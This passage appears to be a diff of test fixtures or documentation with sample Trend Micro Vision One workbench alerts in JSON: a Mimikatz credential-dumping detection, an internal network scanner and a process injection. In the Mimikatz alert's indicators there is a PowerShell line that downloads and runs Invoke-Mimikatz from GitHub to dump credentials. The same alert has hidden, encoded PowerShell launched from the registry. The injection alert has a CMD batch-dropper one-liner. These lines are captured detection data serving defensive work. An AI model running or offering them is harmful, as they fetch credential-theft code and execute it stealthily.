"\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\Explorer.EXE", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "file_sha1", + "field": "processFileHashSha1", + "value": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "file_sha1", + "field": "processFileHashSha1", + "value": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 9, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 10, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 11, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 12, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 13, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 14, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\explorer.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 15, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 16, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\explorer.exe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 17, + "type": "process_id", + "field": "processPid", + "value": "5040", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 18, + "type": "process_id", + "field": "parentPid", + "value": "9920", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 19, + "type": "process_id", + "field": "processPid", + "value": "5040", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 20, + "type": "process_id", + "field": "parentPid", + "value": "9920", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_internal_network_scanner" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509", + "alertProvider": "SAE", + "modelId": "fc93e58b-142a-46bd-89b3-0670004728da", + "model": "Internal Network Scanner", + "modelType": "preset", + "score": 22, + "severity": "low", + "createdDateTime": "2024-07-23T14:46:11Z", + "updatedDateTime": "2024-07-23T14:46:11Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "john\\doe", + "entityId": "john\\doe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "name": "doe10", + "ips": [ + "1.2.3.4" + ] + }, + "entityId": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "relatedEntities": [ + "john\\doe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8 + ], + "provenance": [ + "Sweeping", + "Alert" + ], + "managementScopeGroupId": "a008286d-c35c-4b85-85bb-6c744b27c2e7" + } + ] + }, + "description": "Detects usage of network scanner to gather information", + "matchedRules": [ + { + "id": "1382c167-1c06-4312-89bd-2db0573a0a3e", + "name": "Internal Network Scanning", + "matchedFilters": [ + { + "id": "95fa94aa-126d-40a1-92dd-e4427da20897", + "name": "Internal Network Scanning via Famatech Scanner Tools", + "matchedDateTime": "2024-07-23T14:41:48.126Z", + "mitreTechniqueIds": [ + "T1046" + ], + "matchedEvents": [ + { + "uuid": "47028c1b-ba5b-45ec-98b0-2f62b8ee1665", + "matchedDateTime": "2024-07-23T14:41:48.126Z", + "type": "TELEMETRY_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "processCmd", + "value": "C:\\WINDOWS\\Explorer.EXE", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "objectCmd", + "value": "\"C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\" ", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "file_sha256", + "field": "objectFileHashSha256", + "value": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Windows\\explorer.exe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "fullpath", + "field": "objectFilePath", + "value": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "user_account", + "field": "logonUser", + "value": "doe", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [ + "95fa94aa-126d-40a1-92dd-e4427da20897" + ], + "provenance": [ + "Related Asset Enrichment", + "Alert" + ] + }, + { + "id": 8, + "type": "user_account", + "field": "", + "value": "Syst\u00e8me", + "relatedEntities": [ + "3F783642-C0D0-4AFD-84B6-F6751E5BF80F" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + } + ] + } + ``` + + + +=== "test_process" + + + ```json + { + "schemaVersion": "1.12", + "id": "WB-9002-20220906-00023", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://THE_WORKBENCH_URL", + "alertProvider": "SAE", + "modelId": "1ebd4f91-4b28-40b4-87f5-8defee4791d8", + "model": "Credential Dumping via Mimikatz", + "modelType": "preset", + "score": 64, + "severity": "high", + "createdDateTime": "2022-09-06T02:49:30Z", + "updatedDateTime": "2022-09-06T02:49:50Z", + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "shockwave\\sam", + "entityId": "shockwave\\sam", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "name": "nimda", + "ips": [ + "10.10.58.51" + ] + }, + "entityId": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "managementScopeGroupId": "deadbeef-292e-42ae-86be-d2fef483a248", + "managementScopeInstanceId": "1babc299-52de-44f4-a1d2-8a224f391eee", + "managementScopePartitionKey": "4c1850c0-8a2a-4637-9f88-6afbab54dd79", + "relatedEntities": [ + "shockwave\\sam" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7 + ], + "provenance": [ + "Alert" + ] + } + ] + }, + "description": "A user obtained account logon information that can be used to access remote systems via Mimikatz.", + "matchedRules": [ + { + "id": "1288958d-3062-4a75-91fc-51b2a49bc7d7", + "name": "Potential Credential Dumping via Mimikatz", + "matchedFilters": [ + { + "id": "49d327c4-361f-43f0-b66c-cab433495e42", + "name": "Possible Credential Dumping via Mimikatz", + "matchedDateTime": "2022-09-05T03:53:57.199Z", + "mitreTechniqueIds": [ + "V9.T1003.001", + "V9.T1059.003", + "V9.T1212" + ], + "matchedEvents": [ + { + "uuid": "e168a6e5-27b1-462b-ad3e-5146df4e6aa5", + "matchedDateTime": "2022-09-05T03:53:57.199Z", + "type": "TELEMETRY_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "objectCmd", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe \"iex (new-object net.webclient).downloadstring(\" \"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\"", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "processCmd", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "parentCmd", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "file_sha1", + "field": "objectFileHashSha1", + "value": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "fullpath", + "field": "objectFilePath", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "fullpath", + "field": "processFilePath", + "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "text", + "field": "endpointHostName", + "value": "Nimda", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "49d327c4-361f-43f0-b66c-cab433495e42" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_project_injection" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3", + "alertProvider": "SAE", + "modelId": "bec297c0-7e55-488e-b02a-192a87069661", + "model": "Process Injection from Windows Temporary Location to System32", + "modelType": "preset", + "score": 51, + "severity": "medium", + "createdDateTime": "2024-07-23T07:49:48Z", + "updatedDateTime": "2024-07-23T07:49:59Z", + "ownerIds": [], + "incidentId": "IC-14558-20240722-00000", + "impactScope": { + "desktopCount": 14, + "serverCount": 1, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "windows10\\jdoe", + "entityId": "windows10\\jdoe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "name": "CHTX-XMEDICA-2K12.windows10.local", + "ips": [ + "19.112.87.74" + ] + }, + "entityId": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "E991724A-42D2-44F9-B122-40290A2E9E15", + "name": "PRESTATAIR-2K19", + "ips": [ + "1.231.184.40" + ] + }, + "entityId": "E991724A-42D2-44F9-B122-40290A2E9E15", + "relatedEntities": [ + "windows10\\jdoe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9, + 10, + 11, + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20, + 21, + 22 + ], + "provenance": [ + "Sweeping", + "Alert" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "BACF072C-4180-4F3A-B7E0-3E8984282294", + "name": "", + "ips": [ + "" + ] + }, + "entityId": "BACF072C-4180-4F3A-B7E0-3E8984282294", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "name": "XBURN-2K16", + "ips": [ + "248.131.28.153" + ] + }, + "entityId": "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "name": "LB-XMEDICA-2K12", + "ips": [ + "247.47.158.155" + ] + }, + "entityId": "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "07C50CDB-F5A9-4368-9035-3173E9580770", + "name": "C2583-SCLITE1-2", + "ips": [ + "174.76.164.124" + ] + }, + "entityId": "07C50CDB-F5A9-4368-9035-3173E9580770", + "relatedEntities": [], + "relatedIndicatorIds": [ + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "D198406E-C84D-4254-8268-F6D02946EFCE", + "name": "MONECHO-2K22", + "ips": [ + "236.2.20.78" + ] + }, + "entityId": "D198406E-C84D-4254-8268-F6D02946EFCE", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "name": "DXRECUP-2K19-T.windows10.local", + "ips": [ + "fe80::cd06:59d9:574d:d989%14" + ] + }, + "entityId": "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "name": "XMEDPRINT-2K19", + "ips": [ + "89.67.140.152" + ] + }, + "entityId": "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77", + "name": "SCR-2K16", + "ips": [ + "156.39.139.182" + ] + }, + "entityId": "B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77", + "relatedEntities": [], + "relatedIndicatorIds": [ + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "48c7d9d7-54b0-4d1b-8150-3a1657a303d8" + }, + { + "entityType": "host", + "entityValue": { + "guid": "8F56027B-D321-4914-AD72-B97B2888A414", + "name": "ANTARES-2K16", + "ips": [ + "82.9.180.60" + ] + }, + "entityId": "8F56027B-D321-4914-AD72-B97B2888A414", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "name": "SATIS-2K22", + "ips": [ + "237.154.233.153" + ] + }, + "entityId": "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "673794B3-E11C-4992-8713-6CC954D64E21", + "name": "COPILOTE-TEST.windows10.local", + "ips": [ + "172.39.11.166" + ] + }, + "entityId": "673794B3-E11C-4992-8713-6CC954D64E21", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "D62C5057-F860-4B23-9BB9-706C41B08543", + "name": "NEWAC-LB-2K22.windows10.local", + "ips": [ + "fe80::87e9:927d:58dd:d66c%5" + ] + }, + "entityId": "D62C5057-F860-4B23-9BB9-706C41B08543", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "6F95CE0D-0F49-4FF1-9413-3B57FC82B680", + "name": "BI4-2K22.windows10.local", + "ips": [ + "96.70.247.104" + ] + }, + "entityId": "6F95CE0D-0F49-4FF1-9413-3B57FC82B680", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + } + ] + }, + "description": "Detects possible unauthorized windows system process modification from a process running in Windows temporary locations", + "matchedRules": [ + { + "id": "34885eaa-08ba-4efc-ae46-70663dba0804", + "name": "Process Injection from Windows Temporary Location to System32", + "matchedFilters": [ + { + "id": "1aeea7bb-9b05-4dff-af2b-30027e53bb15", + "name": "Process Injection To System32 Executable via CMD", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "mitreTechniqueIds": [ + "T1055.012", + "T1055" + ], + "matchedEvents": [ + { + "uuid": "aa8247f3-ab9f-4af1-bc70-f83ec4943ebb", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "type": "TELEMETRY_MODIFIED_PROCESS" + } + ] + }, + { + "id": "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb", + "name": "Cross-Process Injection by Process from Temporary Locations", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "mitreTechniqueIds": [ + "T1055" + ], + "matchedEvents": [ + { + "uuid": "aa8247f3-ab9f-4af1-bc70-f83ec4943ebb", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "type": "TELEMETRY_MODIFIED_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "objectCmd", + "value": "C:\\WINDOWS\\System32\\gpresult.exe /R", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15", + "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "BACF072C-4180-4F3A-B7E0-3E8984282294", + "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "D198406E-C84D-4254-8268-F6D02946EFCE", + "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "8F56027B-D321-4914-AD72-B97B2888A414", + "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "673794B3-E11C-4992-8713-6CC954D64E21", + "D62C5057-F860-4B23-9BB9-706C41B08543", + "6F95CE0D-0F49-4FF1-9413-3B57FC82B680" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "parentCmd", + "value": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "processCmd", + "value": "SesProbe-31944.exe ", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "processCmd", + "value": "SesProbe-31944.exe ", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "command_line", + "field": "objectCmd", + "value": "C:\\WINDOWS\\System32\\gpresult.exe /R", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15", + "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "BACF072C-4180-4F3A-B7E0-3E8984282294", + "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "D198406E-C84D-4254-8268-F6D02946EFCE", + "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "8F56027B-D321-4914-AD72-B97B2888A414", + "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "673794B3-E11C-4992-8713-6CC954D64E21", + "D62C5057-F860-4B23-9BB9-706C41B08543", + "6F95CE0D-0F49-4FF1-9413-3B57FC82B680" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "command_line", + "field": "parentCmd", + "value": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "file_sha1", + "field": "processFileHashSha1", + "value": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15", + "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "BACF072C-4180-4F3A-B7E0-3E8984282294", + "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "07C50CDB-F5A9-4368-9035-3173E9580770", + "D198406E-C84D-4254-8268-F6D02946EFCE", + "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77", + "8F56027B-D321-4914-AD72-B97B2888A414", + "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "673794B3-E11C-4992-8713-6CC954D64E21", + "D62C5057-F860-4B23-9BB9-706C41B08543", + "6F95CE0D-0F49-4FF1-9413-3B57FC82B680" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "file_sha256", + "field": 